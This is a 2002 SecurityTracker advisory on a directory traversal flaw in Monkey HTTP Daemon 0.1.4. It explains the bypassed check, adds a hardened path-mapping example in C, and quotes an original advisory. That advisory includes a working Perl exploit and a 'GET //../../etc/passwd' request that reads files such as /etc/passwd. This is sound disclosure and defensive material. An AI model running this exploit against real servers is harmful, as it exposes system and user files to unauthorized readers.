Monkey HTTP Daemon Discloses Files on the System to Remote Users

SecurityTracker Alert ID: 1005293
CVE Reference: GENERIC-MAP-NOMATCH
Date: Sep 26 2002
Impact: Disclosure of system information, Disclosure of user information
Exploit Included: Yes
Version(s): 0.1.4

Description: An information disclosure vulnerability was reported in the Monkey HTTP Daemon. A remote user can view files located outside of the web server document directory.

Illegal Instruction Labs warned that a remote user can supply a specially crafted URL containing the '../' directory traversal sequence to view files located outside of the SERVER_ROOT directory that are readable by the web server process (if the daemon runs as root, that is any file on the system).

According to the report, the only guard is a check in src/method.c: if the request is for the root directory ('/') or if the second character of the request is a period ('.'), the path is set to SERVER_ROOT. A request beginning with '/../' is therefore mapped to the document root, but the check looks no further than the second character, so a request whose second character is a second slash passes it and the '../' components that follow are resolved by the filesystem. A remote user must therefore craft the following type of request to exploit the flaw:

GET //../../../../../../../../../etc/passwd HTTP/1.0

Some demonstration exploit code is provided in the Source Message.
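The check quoted from src/method.c in the Source Message below, reproduced in isolation next to a hardened version, as an added example (editor's code, not Monkey's own source). SERVER_ROOT is set to /var/www for the example, and the buffer sizes, depth limit and function names are this example's own assumptions. The hardened mapping walks the request segment by segment, collapses repeated slashes, resolves '.' and '..' lexically and refuses any request that would climb above the root, so '//../' gets no further than '/../'.

```c
/* Added example (editor's code, not Monkey's source): the src/method.c check
 * the advisory quotes, reproduced in isolation, next to a hardened mapping.
 * SERVER_ROOT, MAX_SEGS, the buffer sizes and the function names are
 * assumptions made for this example. */
#include <stdio.h>
#include <string.h>

#define SERVER_ROOT "/var/www"          /* assumed document root */
#define MAX_SEGS    64                  /* assumed limit on path depth */

static char g_flawed[512];
static char g_safe[512];

/* Monkey 0.1.4 as described by the advisory: "/" or a request whose second
 * character is '.' maps to SERVER_ROOT; anything else is appended verbatim.
 * The caller passes a request-URI that begins with '/'. */
const char *flawed_map(const char *aux_request)
{
    if (strcmp(aux_request, "/") == 0 || aux_request[1] == '.') {
        snprintf(g_flawed, sizeof g_flawed, "%s", SERVER_ROOT);
    } else {
        snprintf(g_flawed, sizeof g_flawed, "%s%s", SERVER_ROOT, aux_request);
    }
    return g_flawed;   /* "//../etc/passwd" -> "/var/www//../etc/passwd" */
}

/* Hardened mapping: walk the request segment by segment, collapsing repeated
 * slashes and resolving "." and "..", and refuse any request that would climb
 * above SERVER_ROOT. Returns the mapped path, or NULL when the request is
 * rejected. */
const char *safe_map(const char *request)
{
    const char *seg[MAX_SEGS];
    size_t      len[MAX_SEGS];
    int         depth = 0;
    const char *p = request;

    if (request[0] != '/')
        return NULL;                    /* request-URI must be absolute */

    while (*p) {
        while (*p == '/')               /* "//" is one separator, not a segment */
            p++;
        if (!*p)
            break;
        const char *start = p;
        while (*p && *p != '/')
            p++;
        size_t n = (size_t)(p - start);

        if (n == 1 && start[0] == '.')
            continue;                   /* "." changes nothing */
        if (n == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0)
                return NULL;            /* ".." above the root: reject */
            depth--;
            continue;
        }
        if (depth == MAX_SEGS)
            return NULL;                /* deeper than this example allows */
        seg[depth] = start;
        len[depth] = n;
        depth++;
    }

    int used = snprintf(g_safe, sizeof g_safe, "%s", SERVER_ROOT);
    if (used < 0 || (size_t)used >= sizeof g_safe)
        return NULL;
    for (int i = 0; i < depth; i++) {
        int w = snprintf(g_safe + used, sizeof g_safe - (size_t)used,
                         "/%.*s", (int)len[i], seg[i]);
        if (w < 0 || (size_t)w >= sizeof g_safe - (size_t)used)
            return NULL;                /* would not fit in the buffer */
        used += w;
    }
    return g_safe;
}

int main(void)
{
    const char *reqs[] = {
        "/../../etc/passwd",            /* caught by the 0.1.4 check */
        "//../../etc/passwd",           /* the advisory's bypass */
        "/a/../b/./c.html",             /* ordinary relative components */
    };
    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++) {
        const char *hardened = safe_map(reqs[i]);
        printf("%-20s  0.1.4: %-28s  hardened: %s\n", reqs[i],
               flawed_map(reqs[i]), hardened ? hardened : "REJECTED");
    }
    return 0;
}
```

The lexical walk covers what the advisory describes (a leading '//' and '..' components). Two things it does not cover and a real server must: percent-decoding of the request path has to happen before the walk, or '%2e%2e' survives it, and a symlink inside SERVER_ROOT that points outside it is only caught by resolving the final path (realpath) and checking that the result still has SERVER_ROOT as its prefix.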

Impact: A remote user can view files located outside of the web server document directory that are readable by the web server process.

Solution: No solution was available at the time of this entry.

Vendor URL: monkeyd.sourceforge.net/
Cause: Access control error, Input validation error
Underlying OS: Linux (Any), UNIX (Any)
Reported By: DownBload <downbload@hotmail.com>

Message History:
This archive entry has one or more follow-up message(s) listed below.

Source Message Contents

Date: 25 Sep 2002 09:10:45 -0000
From: DownBload <downbload@hotmail.com>
Subject: IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4)

[ Illegal Instruction Labs Advisory ]
[-------------------------------------------------------------------------]
Advisory name: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server
Advisory number: 12
Application: Monkey (0.1.4) HTTP server
Application author: Eduardo Silva (EdsipeR)
Author e-mail: edsiper@linux-chile.org
Monkey Project: http://monkeyd.sourceforge.net
Date: 06.09.2002
Impact: Attacker can read files outside of the SERVER_ROOT directory
Tested on: Debian 2.1 (2.0.36 kernel)
Discovered by: DownBload
Mail me @: downbload@hotmail.com
======[ Overview
Monkey is a very simple and fast HTTP server (daemon).
Monkey supports the HEAD & GET methods, multiple connections, and 100 MIME types.
======[ Problem
Monkey doesn't check the HTTP request for the ../ string, and because of that,
an attacker can view any file outside of the SERVER_ROOT directory which Monkey can
read (if Monkey is running under the root account, the attacker can read any file
on that machine).
There is still one thing which will make the attack a little more "complicated":
- src/method.c
    ...
    if((strcmp(aux_request,"/"))==0 || aux_request[1]=='.' ) {
        snprintf(filename,255,"%s",SERVER_ROOT);
    ...
Translated to (poor:) English:
If our request is / or the second char of our request is ., then the path will be
set to SERVER_ROOT, and in that case we can't go out of the SERVER_ROOT
directory.
The previous "if" will prevent a simple reverse traversal attack like this one:
---cut here---
GET /../../../../../../../../../etc/passwd HTTP/1.0
---cut here---
But it can't prevent this reverse traversal attack:
---cut here---
GET //../../../../../../../../../etc/passwd HTTP/1.0
---cut here---
======[ Exploit
---cut here---
#!/usr/bin/perl
# (0 day;) Monkey-0.1.4 reverse traversal exploit
# Usage:
# perl monkey.pl <hostname> <httpport> <file>
# <hostname> - target host
# <httpport> - port on which HTTP daemon is listening
# <file> - file which you wanna get
# Example:
# perl monkey.pl www.ii-labs.org 80 /etc/passwd
#
# by DownBload <downbload@hotmail.com>
# Illegal Instruction Labs
use strict;
use warnings;
use IO::Socket;

my ($host, $port, $file, $SOCK);

# Open a fresh TCP connection to the target's HTTP port.
sub sock {
    $SOCK = IO::Socket::INET->new(PeerAddr => $host,
                                  PeerPort => $port,
                                  Proto    => "tcp")
        || die "[ ERROR: Can't connect to $host!!! ]\n\n";
}

sub banner {
    print "[--------------------------------------------------]\n";
    print "[ Monkey-0.1.4 reverse traversal exploit ]\n";
    print "[ by DownBload <downbload\@hotmail.com> ]\n";
    print "[ Illegal Instruction Labs ]\n";
    print "[--------------------------------------------------]\n";
}

if ($#ARGV != 2) {
    banner();
    print "[ Usage: ]\n";
    print "[ perl monkey.pl <hostname> <httpport> <file> ]\n";
    print "[--------------------------------------------------]\n";
    exit(0);
}

$host = $ARGV[0];
$port = $ARGV[1];
$file = $ARGV[2];
banner();

# Probe: send a HEAD request and look for "Monkey" in the response headers.
print "[ Connecting to $host... ]\n";
sock();
print "[ Sending probe... ]\n";
print $SOCK "HEAD / HTTP/1.0\n\n";
my $response = "";
while (my $chunk = <$SOCK>) { $response .= $chunk; }
if ($response =~ /Monkey/) {
    print "[ Monkey HTTP server found, continuing... ]\n";
} else {
    die "[ SORRY: That's not Monkey HTTP server :( ]\n\n";
}
close($SOCK);

# Attack: the leading double slash gets past the "second character is '.'"
# check in src/method.c, so the ../ components reach the filesystem.
print "[ Connecting to $host... ]\n";
sock();
print "[ Sending GET request... ]\n";
print $SOCK "GET //../../../../../../../../../$file HTTP/1.0\n\n";
print "[ Waiting for response... ]\n\n";
while (my $line = <$SOCK>) { print $line; }
close($SOCK);
---cut here---
======[ Greetz
Greetz goes to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>.
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis,
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org
(NetZero & Paradox). I'm very sorry if I forgot someone.